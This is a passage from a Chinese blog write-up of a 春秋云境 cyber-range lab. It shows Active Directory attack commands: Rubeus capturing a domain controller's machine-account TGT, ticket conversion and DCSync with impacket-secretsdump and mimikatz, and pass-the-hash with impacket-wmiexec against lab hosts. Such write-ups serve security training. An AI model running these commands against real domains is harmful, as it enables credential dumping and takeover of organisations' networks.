<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501202614834.png" alt="image-20250501202614834"></p>
<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501202929756.png" alt="image-20250501202929756"></p>
<p>Rubeus开启监听并获取域控机器用户的TGT票据</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Rubeus-net47.exe monitor &#x2F;interval:3 &#x2F;targetuser:DC01$ &#x2F;nowrap</span><br></pre></td></tr></table></figure>

<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501204022976.png" alt="image-20250501204022976"></p>
<h1 id="攻击域控"><a href="#攻击域控" class="headerlink" title="攻击域控"></a>攻击域控</h1><p>kali导入票据进行dcsync</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># 转换票据</span><br><span class="line">echo &#39;doIFlDCCBZCg..&#39; | base64 -d &gt; DC.kirbi</span><br><span class="line">impacket-ticketConverter DC.kirbi DC.ccache</span><br><span class="line"></span><br><span class="line"># 导入票据</span><br><span class="line">export KRB5CCNAME&#x3D;DC.ccache</span><br><span class="line"></span><br><span class="line"># 查看票据</span><br><span class="line">klist</span><br><span class="line"></span><br><span class="line"># secretsdump</span><br><span class="line">正确：impacket-secretsdump -k -no-pass &#39;DC-1$&#39;@DC-1.test.com -dc-ip 192.168.100.128</span><br><span class="line">错误：impacket-secretsdump xiaorang.lab&#x2F;Administrator@172.22.4.7 -just-dc-ntlm -k -no-pass</span><br></pre></td></tr></table></figure>

<p>可以看到导入的票据为krbtgt的TGT票据</p>
<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250508015256007.png" alt="image-20250508015256007"></p>
<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250508015315649.png" alt="image-20250508015315649"></p>
<p>也可以用 Rubeus + mimikatz</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Rubeus.exe ptt &#x2F;ticket:doIFlDC...</span><br><span class="line">klist</span><br><span class="line">mimikatz.exe &quot;lsadump::dcsync &#x2F;domain:xiaorang.lab &#x2F;all &#x2F;csv&quot; exit</span><br></pre></td></tr></table></figure>

<p><img src="https://picgo-1305609125.cos.ap-nanjing.myqcloud.com/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/image-20250501220838432.png" alt="image-20250501220838432"></p>
<p>PTH打域控和另一台</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">proxychains4 -q impacket-wmiexec xiaorang.lab&#x2F;Administrator@172.22.4.19 -hashes :4889f6553239ace1f7c47fa2c619c252 -codec GBK -shell-type powershell</span><br><span class="line"></span><br><span class="line">proxychains4 -q impacket-wmiexec xiaorang.lab&#x2F;Administrator@172.22.4.7 -hashes :4889f6553239ace1f7c47fa2c619c252 -codec GBK -shell-type powershell</span><br></pre></td></tr></table></figure>




    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/05/02/Privilege/" rel="prev" title="春秋云境-Privilege">
                  <i class="fa fa-angle-left"></i> 春秋云境-Privilege
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/05/20/ThermalPower/" rel="next" title="春秋云境-ThermalPower">
                  春秋云境-ThermalPower <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Y0ng</span>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  





</body>
</html>
